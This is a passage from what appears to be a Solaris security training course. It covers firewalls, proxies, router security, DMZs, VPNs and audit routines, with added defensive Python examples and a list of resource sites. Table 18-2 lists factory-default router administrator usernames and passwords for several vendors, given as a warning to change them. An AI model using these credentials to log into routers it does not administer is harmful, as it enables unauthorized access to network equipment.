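        # access to the console, as the text describes.
        findings.append(("ALERT", "%d failed OpenBoot password attempt(s) "
                                  "recorded since the counter was last reset" % bad))
    return findings


def assess_eeprom_output(text):
    return assess_eeprom_security(parse_eeprom(text))


if __name__ == "__main__":
    for label, sample in [("ok", EEPROM_OK), ("suspect", EEPROM_SUSPECT),
                          ("open", EEPROM_OPEN)]:
        print(label, assess_eeprom_output(sample) or "no findings")
```

On a live host, feed it the output of `eeprom security-mode security-#badlogins`. Once an alert has been investigated, the counter can be returned to zero with `eeprom security-#badlogins=0` so that the next run only reports new attempts.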

Exercise: Working With Physical Security

In this exercise, you complete the following tasks:

● Disable the Stop-A key

● Consider the physical security of your own systems

Preparation

No preparation is required for this exercise.

Task – Disabling the Stop-A Key

Use the Stop-A key to access the OpenBoot firmware and browse the help information. Resume your system operation and disable the Stop-A key. Verify that you can no longer use the Stop-A key.

Re-enable the Stop-A key.

Task – Considering the Physical Security of Your Systems

This is a pen and paper exercise. List your thoughts under the following headings:

● How is physical access to your data centers controlled?

● How is physical access to your networking equipment controlled, especially hubs, switches, and routers not located in the data centers?

● Do your users have access to physical workstations (including PCs) rather than having access only to screens, keyboards, and mice?

● Do you allow contractors or consultants to plug their own equipment into your network?

Exercise Summary

Discussion – Take a few minutes to discuss what experiences, issues, or discoveries you had during the lab exercise.

● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions

This section provides the solutions for the exercises in this module.

Disabling the Stop-A Key

Use the Stop-A key to access the OpenBoot firmware and browse the help information.

Resume your system operation and disable the Stop-A key by adding the following line to the /etc/system file:

set abort_enable = 0

Reboot the system for this change to take effect.

Verify that you can no longer use the Stop-A key.

Re-enable the Stop-A key by removing from the /etc/system file the line that you added earlier.

Reboot the system for this change to take effect.

Considering the Physical Security of Your Systems

Only you or someone in your organization can answer these questions.

Module 18

Connecting the Enterprise Network to the Outside World

Objectives

Upon completion of this module, you should be able to:

● Explain the importance and role of firewalls, proxy servers, and other enterprise network security components

● Describe ongoing security tasks

● Explain the role of security audits

● List common sources of security information

Relevance

Discussion – By now, you are aware of the potential dangers to networked hosts. However, it is not ideal to rely solely on host security to ensure enterprise security when connecting to external networks, such as the Internet.

● What types of technologies might be used to protect an enterprise network when connected to the Internet?

Additional Resources

Additional resources – The following references provide additional information on the topics described in this module:

● Zwicky, Elizabeth D., Simon Cooper, and D. Brent Chapman. Building Internet Firewalls. 2nd Edition. O’Reilly & Associates, 2000.

● Cheswick, Bill and Steve Bellovin. Firewalls and Internet Security: Repelling the Wily Hacker. Addison Wesley, 1994.

● Comer, Douglas and David Stevens. Internetworking with TCP/IP. Vols. I (1997), II (1998), and III (2000). Prentice Hall.

Designing the Network to Improve Security

The primary reason to network computers together is communication. Unfortunately, given the widespread status of virus and Trojan code, and with increasing numbers of potential intruders present on the Internet, a defensive strategy is vital. The corporate network, the data it holds, and the hosts that form part of it are all valuable assets that need protection from improper use.

You can use various tools and products to secure the boundary between the enterprise network and the outside world. This section looks at the common components and the ways in which they are applied.

Improving Security With a Firewall

The term firewall is used in different ways by different people. However, the primary objective of a firewall is to monitor all network traffic between two networks (usually a corporate network and the Internet), and to block and log inappropriate traffic. A firewall can be made up of multiple components, including (but not limited to):

● Packet filters that control access to the network based on the source or destination IP address of a packet

● Proxies, which hide the real address of a host on the corporate network when the host connects to the outside world

● Protocol-based software that uses knowledge of higher-level protocols, such as TCP or SMTP, to identify dubious network activity

The firewall functionality can be spread across multiple hosts and routers, or it can be encapsulated within a single host. When people talk about installing a firewall, they are frequently referring to the installation of a piece of software that includes some or all of these components.

Firewall software is based on rules. Some rules act to specifically allow particular types of network traffic between certain network addresses. Other rules explicitly block network traffic by dropping the network packets. For each type of packet (or datagram), a separate rule can be established, either permitting or blocking the passage of the data. Implicit rules cover those packets not accounted for by the explicit rules.

Ideally, the two networks that a firewall manages should be separated on different network adapters and on different subnets. As always with security, it is prudent to assume that no firewall is subversion-proof. Therefore, if the two networks (the “outside” network and the “inside” network) are physically separated, and exist with differing subnet settings, it follows that if the firewall fails, the connection between the two networks must also fail. (The converse is that if the firewall fails but the connection survives, the network is left exposed.) In other words, the firewall should “fail closed” rather than “fail open.”

Firewalls do not prevent attacks by virus or Trojan writers, but they are highly effective at preventing intrusion. Firewalls have another, perhaps more important function. Companies frequently have extremely valuable data stored on their networks. It is quite easy for someone to inadvertently (or intentionally) publish such data on the company intranet. A firewall can prevent that data from being visible to the outside world unless it is loaded onto an audited portal.

One of the most important features of firewalls is logging. There are two logging features:

● log on success – Events resulting in passage through the firewall are logged.

● log on deny – Events resulting in refusal of passage through the firewall are logged (this is the more usual option).

Examination of the firewall log can be most informative. For example, attempts by a user to connect to one of the Internet virtual hard drives might indicate an attempt to pass company-confidential data outside the company; port scans from the outside are an early indication that someone is preparing an attack on your system.
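The rule model just described (explicit allow and deny rules, an implicit rule for everything else, and log-on-deny) is small enough to show in full. The following is an added example and is not SunScreen or any other product's code: a miniature first-match packet filter with an implicit default deny, a deny log, and the simple port-scan check over that log that the text suggests. The rule syntax, the addresses and the packet sample are all constructed.

```python
"""A miniature rule-based packet filter of the kind the text describes:
explicit allow/deny rules evaluated in order, an implicit default deny for
anything unmatched, 'log on deny' logging, and a check of the deny log for
the port-scan pattern the text says to look for.

Added example, not part of the SC-300 course material and not SunScreen
code. Rule syntax, addresses and packets are constructed.
"""
from collections import defaultdict
import ipaddress

# Explicit rules, first match wins:
# (action, source network, destination network, protocol, destination port or None).
# Constructed policy: a bastion at 192.0.2.10 offers mail and web to the
# world; inside hosts (10/8) may open outbound TCP except telnet.
RULES = [
    ("allow", "0.0.0.0/0",  "192.0.2.10/32", "tcp", 25),
    ("allow", "0.0.0.0/0",  "192.0.2.10/32", "tcp", 80),
    ("deny",  "10.0.0.0/8", "0.0.0.0/0",     "tcp", 23),   # must precede the broad allow below
    ("allow", "10.0.0.0/8", "0.0.0.0/0",     "tcp", None),
]


def match(rule, pkt):
    """True if the packet falls within every field of the rule."""
    _action, src, dst, proto, port = rule
    return (ipaddress.ip_address(pkt["src"]) in ipaddress.ip_network(src)
            and ipaddress.ip_address(pkt["dst"]) in ipaddress.ip_network(dst)
            and pkt["proto"] == proto
            and (port is None or pkt["dport"] == port))


def filter_packet(pkt, rules=RULES, deny_log=None):
    """Return 'allow' or 'deny'. Packets no explicit rule covers hit the
    implicit default, which is deny (fail closed). Every denial is
    appended to deny_log with the reason (log on deny)."""
    verdict, why = "deny", "implicit default"
    for i, rule in enumerate(rules):
        if match(rule, pkt):
            verdict, why = rule[0], "rule %d" % i
            break
    if verdict == "deny" and deny_log is not None:
        deny_log.append(dict(pkt, reason=why))
    return verdict


def port_scan_sources(deny_log, threshold=10):
    """Sources denied on at least `threshold` distinct destination ports:
    the signature of a port scan in the deny log."""
    ports = defaultdict(set)
    for entry in deny_log:
        ports[entry["src"]].add(entry["dport"])
    return sorted(src for src, seen in ports.items() if len(seen) >= threshold)


def sample_traffic():
    """Constructed traffic: three ordinary packets, one with no matching
    rule, and an outside host probing ports 1-20 on the bastion."""
    pkts = [
        {"src": "198.51.100.7", "dst": "192.0.2.10",  "proto": "tcp", "dport": 25},   # inbound mail
        {"src": "10.1.2.3",     "dst": "203.0.113.9", "proto": "tcp", "dport": 443},  # outbound https
        {"src": "10.1.2.3",     "dst": "203.0.113.9", "proto": "tcp", "dport": 23},   # outbound telnet
        {"src": "198.51.100.7", "dst": "192.0.2.10",  "proto": "udp", "dport": 53},   # no rule at all
    ]
    pkts += [{"src": "203.0.113.66", "dst": "192.0.2.10", "proto": "tcp", "dport": p}
             for p in range(1, 21)]
    return pkts


def run(pkts, rules=RULES):
    """Filter a packet list; return the verdicts and the deny log."""
    deny_log = []
    verdicts = [filter_packet(p, rules, deny_log) for p in pkts]
    return verdicts, deny_log


if __name__ == "__main__":
    verdicts, deny_log = run(sample_traffic())
    for entry in deny_log[:4]:
        print("DENY %(src)s -> %(dst)s %(proto)s/%(dport)s (%(reason)s)" % entry)
    print("%d denied in total; possible scanners: %s"
          % (len(deny_log), port_scan_sources(deny_log)))
```

Two points the sample makes concrete: rule order matters (the telnet deny only works because it sits before the broad outbound allow), and the UDP packet shows why the implicit rule must be deny; nothing in the explicit list mentions UDP, and a default of allow would have passed it silently.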

Using Solaris SunScreen Firewall

SunScreen software is a firewall designed to operate with the Solaris OE. As with other firewalls, there is a server, called the screen, and an administration tool, designed to allow insertion and implementation of rules.

SunScreen comes in two versions:

● SunScreen Secure Net 3.1 is a full-featured firewall product designed to be deployed throughout an organization to implement a secure business network including extranets, secure intranets, and remote access.

● SunScreen 3.1 Lite is a firewall product designed to protect individual servers or very small workgroups.


SunScreen software can support up to 15 separate network interfaces, meaning that up to 15 potential net-cards can be supported. This makes SunScreen one of the more powerful firewalls. Another advantage in using SunScreen software is that it incorporates a useful proxy-server capability.

High availability configuration enables SunScreen software to quickly recover to a second screen without losing firewall or encryption sessions. If a firewall is successfully attacked and goes offline, the high-availability features enable a second firewall to take over the compromised firewall or encryption sessions.

SunScreen consists of a rules-based, dynamic packet-filtering engine for network access control, and an encryption and authentication engine that enables the creation of secure virtual private network (VPN) gateways by integrating public-key encryption technology.

SunScreen’s “stealth” capabilities refer to the ability to configure the screen such that it cannot be accessed using an IP address. This provides two benefits for securing a network:

● Potential intruders cannot access the machine running SunScreen Secure Net, making it extremely difficult to compromise this system.

● Installation of SunScreen Secure Net is easier because it can be installed without changing the routing tables.

SunScreen uses open-standard SKIP (Simple Key-management for Internet Protocols) technology for encryption, authentication, access control, and secure VPNs. SunScreen SKIP includes support for many strong, standards-based authentication, encryption, and integrity technologies, including 4096-bit Diffie-Hellman modulus and the new Diffie-Hellman primes.

Evaluating IPsec as a Firewall Replacement

You might think that IPsec does away with the need for a firewall. Some people would argue that adopting IPsec removes the problem of unknown hosts infiltrating the system. It is possible to configure IPsec in such a way that only fully authenticated, encrypted data passes onto a given network. The problem is that when you configure IPsec in this way, it is almost certain that you will lose all Internet connectivity, and a lot of other inter-networking as well.


It is therefore better to regard the two technologies—a firewall and IPsec—as complementary. IPsec controls the basic flow of IP traffic onto the network, and the firewall provides a suitable bottleneck for restricting the types of packets transferred between networks.


Using Routing Security Features

Routers are devices (usually, but not always, hardware) that redirect packets from one network (or subnetwork) to another network. It is not accidental that this description of a router resembles the description of a firewall. In many respects, firewall software performs the same tasks as a router. Many firewalls use one or more routers as part of the overall security solution, largely due to the ability of routers to filter packets as they pass them from one network to the other. The rules that govern this filtering are usually held in EEPROM.

There are many different types of routers available, and each is programmed in a slightly different manner. Some of the more common types are shown in Table 18-1.

Table 18-1 Common Types of Router

Type      Normal Usage

Simple    Connection between LANs

Gigabit   High bandwidth, ultra high-speed routing

DSL       Managed asynchronous connection

ISDN      Combination of an ISDN 2e terminal adapter with a limited function router (usually limited to 10 static routes)

PSTN      Combination of a PSTN modem with a limited function router (usually limited to 10 static routes)

Routers operate by means of routing tables. Typically, these include the following information:

● The name of the route (for convenience only).

● The active status of the route (active or inactive).

● Destination IP address – Routers work between IP addresses. The destination address can be (and might well be) a gateway to another network.

● IP subnet mask – Routers typically redirect packets between networks. This means that redirection between subnets is also possible, and advisable.

● Gateway IP address – If packets are destined for a local network, they are passed directly to the host. If they are destined for any other network, they are passed to the next gateway (router), as defined by this address.

● Private (true or false) – Routes can be public or private. While the terminology might differ, this usually implies that special filtering or encryption is applied.

● Filters – Filters comprise a separate set of tables, each containing a recognized fragment of an IP packet type. As with firewall software, the packets identified by the filters can be allowed or disallowed.

You can control and restrict packets attempting to leave the system by applying the correct filters and suitable encryption.
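As an added illustration of the routing-table fields just listed (this is example code written for this page, not any router vendor's firmware), the following Python models a table with name, active flag, destination network and mask, gateway, private flag, and per-route filters, then performs a longest-prefix lookup and applies the route's filters. The field layout, the filter representation, and the sample routes are assumptions for the illustration. The table has no default route on purpose: a packet for which no route is explicitly defined is dropped, which is the router configuration the audit checklist later in this module asks for.

```python
"""Route lookup over a routing table with the fields listed above.

Added example, not a router vendor's code: the Route fields, the filter
representation and the sample routes are constructed for this illustration.
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, Optional, Set


@dataclass
class Route:
    name: str                                  # for convenience only
    active: bool                               # inactive routes are ignored
    destination: ipaddress.IPv4Network         # destination address + subnet mask
    gateway: Optional[ipaddress.IPv4Address]   # None: directly connected, deliver to host
    private: bool = False                      # special filtering/encryption applies
    # Filters: protocol -> allowed destination ports. None means no filtering;
    # a dict means any protocol or port not listed is dropped.
    filters: Optional[Dict[str, Set[int]]] = None


def lookup(table, dst_ip):
    """Longest-prefix match over the active routes; None if nothing matches."""
    dst = ipaddress.IPv4Address(dst_ip)
    candidates = [r for r in table if r.active and dst in r.destination]
    if not candidates:
        return None
    return max(candidates, key=lambda r: r.destination.prefixlen)


def forward(table, proto, dst_ip, dst_port):
    """Decide a packet's fate: ('deliver', host), ('forward', next_hop) or
    ('drop', reason). A packet with no explicitly defined route is dropped."""
    route = lookup(table, dst_ip)
    if route is None:
        return ("drop", "no route")
    if route.filters is not None:
        allowed = route.filters.get(proto, set())
        if dst_port not in allowed:
            return ("drop", "filtered by route %s" % route.name)
    if route.gateway is None:
        return ("deliver", dst_ip)
    return ("forward", str(route.gateway))


def _net(s):
    return ipaddress.IPv4Network(s)


def _gw(s):
    return ipaddress.IPv4Address(s)


# Constructed sample table (no default route on purpose).
TABLE = [
    Route("lan", True, _net("10.1.0.0/16"), None),
    Route("dmz-web", True, _net("192.0.2.0/24"), _gw("10.1.0.1"),
          filters={"tcp": {80, 443}}),
    # More specific than dmz-web, so it wins for 192.0.2.16 (longest prefix).
    Route("dmz-admin-host", True, _net("192.0.2.16/32"), _gw("10.1.0.3"),
          private=True, filters={"tcp": {22}}),
    Route("partner", False, _net("203.0.113.0/24"), _gw("10.1.0.2")),
]


if __name__ == "__main__":
    for pkt in [("tcp", "10.1.5.9", 22), ("tcp", "192.0.2.5", 80),
                ("tcp", "192.0.2.5", 23), ("tcp", "192.0.2.16", 80),
                ("udp", "192.0.2.5", 53), ("tcp", "203.0.113.4", 80)]:
        print(pkt, "->", forward(TABLE, *pkt))
```

Note the inactive "partner" route: a packet for 203.0.113.0/24 is dropped as "no route" even though a matching entry exists, and the /32 host route overrides the /24 filters for one address, so the port list on the broader route does not apply there.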


Masking Hosts Using a Proxy Server

In its simplest form, a proxy server stands in for an IP client connecting to the outside world. The proxy has an IP address of its own (usually 0.0.0.0). When a client makes a request for a connection, the proxy forwards the connection to the original target, but the request registers as having originated from the proxy, not the requester. At the same time, requests can be filtered through the proxy (for example, for restricted or unsuitable sites), and outgoing data can be blocked or allowed according to type and origin. Returned data can likewise be checked for type suitability. Unsuitable content (Java technology code or ActiveX controls) can be blocked, or even removed. Because the request comes from a single daemon, it is safe to block non-essential ports (to prevent port scan attacks) and impossible for the outside world to establish the IP address of the original requester, or indeed to perform any analysis of the connection.


Proxy software has advanced well beyond its original concept, and in many cases has become conjoined with firewall technology to construct what might be called a defensive perimeter, that is, a combination firewall and proxy server. Most modern proxy offerings now include proxy DNS support, SSL encryption, and FTP filtering. There is often a further advantage. Because proxy servers must cache data returns so that the data can be forwarded to the requester, it follows that the cache provides a major speed increase for much-used network connections because the data is held in RAM, not accessed from the Internet. Documents, and even entire sites, can be preloaded into the cache, or scheduled to load.

A fairly good, Open Source implementation of a fully cached proxy server is available at the following URL: http://www.squid-cache.org/.


Securing Routers, Proxy Servers, and Firewalls

Routers, firewalls, and proxy servers protect administrative functions by using passwords. These passwords must be kept private, because anyone with the appropriate password can change routing tables, and reconfigure firewalls or proxy servers.


Certain firewall components, such as routers, tend to have preconfigured passwords, to make it easy for the administrator to install and configure them. However, some of these passwords are now common knowledge. Therefore, you must change such passwords before the device or software is deployed as part of a firewall system. Some example preset administrative accounts and passwords for common routers are shown in Table 18-2.

You must also remember that routers are usually accessed through a remote terminal. For this reason, you should change passwords regularly and limit knowledge of them to a very few individuals. If possible, you should disable remote connection to firewall components, and enforce administrative changes through the physical console.

Table 18-2 List of Preset Router Administrative Accounts

Manufacturer   Username   Password

Bay Networks   Manager    <null>

3com           admin      synnet

3com           debug      synnet

3com           manager    manager

Cisco          enable     cisco

Cisco          (telnet)   cisco

Shiva          root       <null>

Motorola       cablecom   router


Creating Demilitarized Zones (DMZ)

The term demilitarized zone (or DMZ) refers to a part of the LAN that is between two firewalls. One firewall separates the DMZ from the internal LAN, while the other separates the DMZ from the outside world. The DMZ is an area that permits limited, free communication, but maintains a secure profile for the bulk of the private LAN. It is common to site publicly visible hosts, such as Web servers and FTP servers, on the DMZ.

The DMZ provides an expendable area. If the area becomes contaminated, or security is compromised, then the entire zone can be rebuilt without damaging the internal network or its data.


Providing Secure Access Using a Virtual Private Network

A Virtual Private Network (VPN) uses encryption to create a secure channel between two hosts (or networks) as they communicate over an insecure network, usually the Internet. Each host communicating over a VPN is typically connected to a local network, but with access to the Internet. Communication between the two networks is achieved by “tunneling,” that is, encrypting all data that passes back and forth between the hosts. VPNs can exist between an individual machine and a private network (client-to-server), or a remote LAN and a private network (server-to-server). A typical VPN architecture is shown in Figure 18-1.


Figure 18-1 Architecture of a Virtual Private Network

There are two basic types of VPN:

● Hardware VPNs are essentially encrypting routers. They have a very high bandwidth and are easy to install. They do not, however, offer the flexibility of a software solution.

● Software VPNs range from firewalls which support encryption, to VPN clients, which run on individual workstations.

VPNs are available from a variety of vendors, but can also be constructed using IPsec and firewalls. There is no definitive rule as to the type of security that they offer, but strong encryption and authentication are usually regarded as mandatory.

Constructing a VPN

The first stage in building a VPN is to decide on the level and type of encryption. You would usually apply encryption by configuring IPsec system-wide. A crucial factor is the packet filtering, that is, filtering on whether packets carry the IPsec authentication header, rather than only trusting the IP address. By this method, the interconnected machines know which other machines they are talking to, just as they would if the network were completely closed.

The VPN is now almost complete. For the simplest VPN, the only remaining task is to apply the appropriate filter sets to the firewall, so that packets between the IP addresses known to be on the VPN are allowed, but others (on the same circuit) are dropped.


Sample Architectures

This section describes two network architectures. The first shows an architecture that is considered secure for most environments. It is sufficient for organizations that do not allow uncontrolled access to the network. In practice, this usually means that there is no Internet service. The second example is required for all sites that provide an Internet service or where security threats are particularly high.

Example 1: Normally Secure Network

The configuration shown in Figure 18-2 is the minimum security that should be employed on any network connected to the outside world.

Figure 18-2 Filtered Router and Firewall Network

In this example, the outside world never sees the network because it is connected through a filtered router and a firewall. Packets from the outside world are subjected to a set of rules. Only certain packets are allowed through the router to Netcard A, which is part of the firewall machine. The router discards all other packets. Thus, the router does not allow any direct access from the outside world to any Web servers, even though the traffic is destined for TCP port 80, usually thought of as a safe destination. All traffic must pass through the firewall, which makes decisions about the types of connections allowed (FTP, HTTP, and so on). Because Netcard A and Netcard B are not physically connected, packets only pass if the firewall explicitly allows passage. Firewalls of this type default to “disallow packets”, which means that nothing passes through the firewall unless it is explicitly allowed to do so.

A minimally secure network would have this type of configuration.
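The following Python is an added example (written for this page, not SunScreen's or any vendor's rule language) of the two filtering ideas this module has described: the “disallow packets” default of Example 1, where nothing passes unless a rule explicitly allows it, and the VPN filter set from “Constructing a VPN”, where packets between the VPN peers are allowed only when they carry the IPsec authentication header rather than merely the right source address. The Packet and Rule fields, the addresses, and the rules are assumptions constructed for the illustration; `has_ah` stands for “AH present and already verified by IPsec”.

```python
"""Stateless, first-match packet filter with an implicit default deny and a
rule that requires the IPsec authentication header for VPN peer traffic.

Added example, not SunScreen's or any vendor's code. Fields, addresses and
rules are constructed for this illustration.
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str            # "tcp", "udp", "icmp"
    dport: int = 0        # 0 for protocols without ports
    has_ah: bool = False  # IPsec Authentication Header present and verified


@dataclass(frozen=True)
class Rule:
    name: str
    action: str                  # "allow" or "deny"
    src: str = "0.0.0.0/0"
    dst: str = "0.0.0.0/0"
    proto: Optional[str] = None  # None: any protocol
    dport: Optional[int] = None  # None: any port
    require_ah: bool = False     # match only authenticated packets


def matches(rule: Rule, pkt: Packet) -> bool:
    if ipaddress.ip_address(pkt.src) not in ipaddress.ip_network(rule.src):
        return False
    if ipaddress.ip_address(pkt.dst) not in ipaddress.ip_network(rule.dst):
        return False
    if rule.proto is not None and rule.proto != pkt.proto:
        return False
    if rule.dport is not None and rule.dport != pkt.dport:
        return False
    if rule.require_ah and not pkt.has_ah:
        return False
    return True


def filter_packet(rules: List[Rule], pkt: Packet) -> Tuple[str, str]:
    """First matching rule wins; no match means deny (fail closed)."""
    for rule in rules:
        if matches(rule, pkt):
            return rule.action, rule.name
    return "deny", "default"


def apply_policy(rules, packets):
    """Run packets through the rule set; return decisions and a log-on-deny list."""
    decisions, deny_log = [], []
    for pkt in packets:
        action, name = filter_packet(rules, pkt)
        decisions.append((pkt, action, name))
        if action == "deny":
            deny_log.append("DENY %s %s -> %s:%d (rule %s)"
                            % (pkt.proto, pkt.src, pkt.dst, pkt.dport, name))
    return decisions, deny_log


# Constructed policy: 192.0.2.5 is the public web server reached through
# Netcard A, 10.1.0.0/16 the internal LAN, 203.0.113.0/24 the remote VPN site.
RULES = [
    Rule("vpn-peer", "allow", src="203.0.113.0/24", dst="10.1.0.0/16", require_ah=True),
    Rule("web-in", "allow", dst="192.0.2.5/32", proto="tcp", dport=80),
    # Everything else falls through to the implicit default deny.
]

SAMPLE_PACKETS = [
    Packet("203.0.113.8", "10.1.2.3", "tcp", 445, has_ah=True),  # VPN, authenticated
    Packet("203.0.113.8", "10.1.2.3", "tcp", 445),               # same addresses, no AH
    Packet("198.51.100.7", "192.0.2.5", "tcp", 80),              # HTTP to web server
    Packet("198.51.100.7", "192.0.2.5", "tcp", 23),              # telnet to web server
    Packet("198.51.100.7", "10.1.2.3", "tcp", 80),               # HTTP straight to LAN
]


if __name__ == "__main__":
    for pkt, action, name in apply_policy(RULES, SAMPLE_PACKETS)[0]:
        print("%-5s %-14s %s -> %s:%d" % (action, name, pkt.src, pkt.dst, pkt.dport))
```

The second packet is the case the VPN section warns about: it arrives from an address on the VPN but without the authentication header, so it is dropped even though a naive address-only filter would pass it. Port 80 to the web server is allowed, while port 80 to an internal host is not, which is the router-plus-firewall behaviour of Example 1.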


Example 2: Highly Secured Network With Subnet

In this example, shown in Figure 18-3, there is a higher level of security, provided by a switch or router between the internal network and the firewall.

Figure 18-3 Network Incorporating DMZ

This is the minimum level of protection that should be used when external connections are allowed to internal Web servers. Commonly, this serves to form a DMZ between the internal router and the firewall on which company Web servers reside. This means that the company Web servers are afforded the protection of the firewall but, if one of those Web servers is subverted, the intruder must still defeat the internal router to access the internal network. Because all failed attacks are (by default) logged, it is possible that the administrator would notice an attack pattern on the router, and take preventive action.


Running Enterprise Security Audits

The security audit is an ongoing task for any organization. This type of audit usually includes the following points, although the list is not complete:

● Has the file system been hardened?

Use of Titan, ASET, or both.

● Are the file systems audited on a regular basis?

Use of Solaris OE Fingerprint DB or TripWire.

● Are all non-shared data areas hidden?

● Have all unnecessary network services been disabled?

● Is the appropriate level of encryption applied to network traffic?

Use of OpenSSH, SSL, or IPsec.

● Is authentication applied to network traffic? If not, is this appropriate?

Use of TCP Wrappers and host access.

● Are defenses for network scanning in place?

Use of Courtney, Gabriel, or PortSentry.

● Are the routers configured so that anything that is not explicitly a defined route is forbidden?

● Are the rules for the firewall documented?

Confirm that the documented rules for the firewall are actually implemented by the firewall.

● Confirm that the rules for the proxy server (if any) are those actually in place.

Challenge the proxy server from outside the network.

● Run SAINT (or a similar tool) to establish if any new, or existing, security holes are present.

● Document the results of the audit in a report.


Running Trial Attacks

This course covered the effectiveness of tools such as SAINT in the analysis of network security (see Module 12, “Analyzing Network Services”). These tools are valuable in that they can perform regular attacks on internal networks to ensure the continued security of the hosts on those networks. Such challenges to security represent a vital part of the continuing process of security and you should perform them on a regular, scheduled basis.

Using Third Parties to Run Trial Attacks

Many companies offer the services of both security professionals and “ethical hackers” to challenge networks. This kind of service, when well done, is a useful addition to the internal audit, but does not replace it.


Obviously, there are certain dangers. The greatest of these dangers is that the auditing company is not what it seems to be. You should therefore carry out certain checks, such as:

1. Are the security consultants each individually accredited to a professional (chartered) organization (for example the IEEE, or British Computer Society)?

2. In Europe, individuals must be chartered as experts before they can legally represent themselves as experts. Are the security experts chartered?

3. Has the company produced a full, and commented, plan for the audit?

4. Do the consultants carry sufficient liability insurance?

In some countries, governmental organizations hire out their own staff to perform security audits. Using such staff is highly recommended because they have a high degree of competence, and have been tested by a security service. Similarly, the consultancy arms of the vendors of security hardware and software, for example, Sun Professional Services, have large amounts of experience in performing security audits and are aware of the latest threats and patches.


Applying Ongoing Network Security Measures

Implementing security must not be considered as a one-off task. Security is an integrated, ongoing task that must take a high priority in the scheduled tasks every day. An administrator must frequently monitor and analyze all logs, otherwise attacks could go unnoticed. Also, new security holes are being exposed by intruders on a weekly basis, so you must ensure that the level of protection currently applied is adequate.

Similarly, the network administrator cannot enforce security measures alone. Consider a scenario where the network administrator on a given network has designated repositories for certain classes of document within a company (for example, Secret, Confidential, Personal, and Public). The network file system has been suitably configured to manage security for these repositories, and access permissions have been established. That system will fail if the network administrator has not previously consulted with the general administrator to establish rules as to which document falls within each class. Without such cooperation, virtually all documents are likely to be held as Public, even when this designation is inappropriate.


Identifying Ongoing Tasks

When deciding how to continue the monitoring of a network, there is no correct answer, but rather a correct way of thinking. This section examines some of the tasks that should be performed, and the frequency with which they should be performed.

If setting up a new network or adding a new host, perform a security audit on the affected host and network.

● Example annual tasks:

● Run the internal security audit procedure.

● Optionally, have the network challenged by external auditors.

● Correct any problems found.


● Example monthly tasks:

● Challenge the system using SAINT (or a similar tool) using the www.SANS.org “top 10 Internet threats” as a starting point. Correct any problems found.

● Examine the routers. Audit for any unauthorized changes.

● Examine the proxy server logs. Submit any anomalies to triage to establish if a new rule should be applied.


● Example daily tasks, and throughout the day:

● Check that the backups are executed.

● Examine the logs for the firewall and the proxy server for the last 24 hours. Is there anything to give cause for concern?

● Examine system logs generated by tools such as Courtney.

● Examine network activity at various times through the day. Is there anything unexpected?

● Check the current connections for the proxy server. Gain an impression of the type of site being connected. Is there anything to give cause for concern?

Note – The precise list of tasks depends on the type of software deployed at your site.


Keeping Current With Security Issues

New challenges occur all the time. Intruders are continually attempting to disrupt and by-pass security, and as soon as one hole is plugged, another is found. However, the greatest danger is complacency. To avoid becoming complacent about security, consider consulting with the world-wide security community regarding new challenges.


Identifying Information Sources

Many sites have been published with world-wide security consultation in mind. Good sources of information can be obtained at the sites shown in Table 18-3.

Table 18-3 Sites Offering Security Information

Site – Information Offered

http://www.sun.com/security/ – A Sun site, and a good starting point for Solaris OE systems.

http://www.sun.com/trustedsolaris/ts_tech_faq/ – Trusted Solaris OE information from Sun.

http://www.SANS.org – Up-to-date information on current identified intruder techniques and attacks.

http://www.cert.org – A central clearing house for known security holes and fixes. Particularly notable are the CERT advisories that alert administrators to the latest security breaches.

http://www.w3.org/Security/Faq/www-security-faq.html – A general security FAQ site.

http://csrc.nist.gov/ – A security portal, and a good general starting point.

http://www.gocsi.com/ – A computer crime and security portal.

http://www.securityportal.com/ – An up-to-date list of current virus attacks and UNIX-centric challenges.

http://www.bigadmin.com – Solaris OE administration site with vast amounts of information and tools.

ftp://ftp.cerias.purdue.edu/pub/tools/unix – Comprehensive repository of Solaris OE tools, formerly known as COAST.

More information sources are supplied in Appendix A.


Appendix A

On-Line Security Resources

Advisory and Certification Bodies

CERT

http://www.cert.org

The CERT Coordination Center (CERT/CC) is a center of Internet security expertise. It is located at the Software Engineering Institute (http://www.sei.cmu.edu/), a federally funded research and development center operated by Carnegie Mellon University.

At the CERT/CC, they study Internet security vulnerabilities, handle computer security incidents, publish a variety of security alerts, perform research for long-term changes in networked systems, and develop information and training to help improve security at your site.

INFOSEC - Information Systems Security Organization

http://www.nsa.gov/isso/index.html

Part of the U.S. National Security Agency (NSA). INFOSEC provides the solutions, products, and services, and conducts defensive information operations, to achieve information assurance for information infrastructures critical to U.S. National Security interests.


Computer Security Technology Center

http://ciac.llnl.gov/cstc/CSTCHome.html

The Computer Security Technology Center, located at the Lawrence Livermore National Laboratory, provides solutions to U.S. government agencies facing today's security challenges in information technology. They maintain information protection and core-competencies through high-tech, integrated INFOSEC incident response, product development, and consulting services.


Security Standards

The following groups work with security standards.

Common Criteria

http://www.commoncriteria.org

This is currently the only globally accepted security standard. Orange Book and ITSEC standards are obsolete because of this.

National Security Agency (NSA)

http://www.nsa.gov

The NSA National Computer Security Center (NCSC) is responsible for the security of the Department of Defense (DoD) and intelligence community. The NSA is also the source of the NSA Rainbow Series of Publications for Computer Software Security. The Rainbow Series deals with evaluating trusted computer systems; each publication is a different color. For example, the Orange Book deals with physical security levels, which control access to the system.

CSRC – Computer Security Division

http://csrc.nist.gov/

This site contains information about a variety of computer security issues, products, and research of concern to federal agencies, industries, and users. This site is operated and maintained by the National Institute of Standards and Technology’s (NIST) Computer Security Division as a service to the computer security and IT community.


ITSEC (Europe)

http://www.itsec.gov.uk/

ITSEC is all about IT security, making sure that you can trust theinformation technology infrastructure on which your organization relies.Under the UK ITSEC scheme, the security features of IT systems andproducts are tested independently of suppliers to identify logicalvulnerabilities. This type of testing is known as security evaluation and itis carried out against standardized criteria to a formalized methodology.Certificates are issued by the Scheme for products meeting therequirements for a claimed level of assurance. United Kingdomcertificates are recognized in many countries of the world.

IEEE Computer Society

http://www.computer.org/

With over 100,000 members, the Institute of Electrical and Electronics Engineers (IEEE) Computer Society is the world's leading organization of computer professionals. Founded in 1946, it is the largest of the 36 societies of the IEEE.

The Computer Society's vision is to be the leading provider of technical information and services to the world's computing professionals. It develops electrical and communications standards. This includes Portable Operating Systems Interface (POSIX) P1003.6, a security standard.

IETF

http://www.ietf.org/

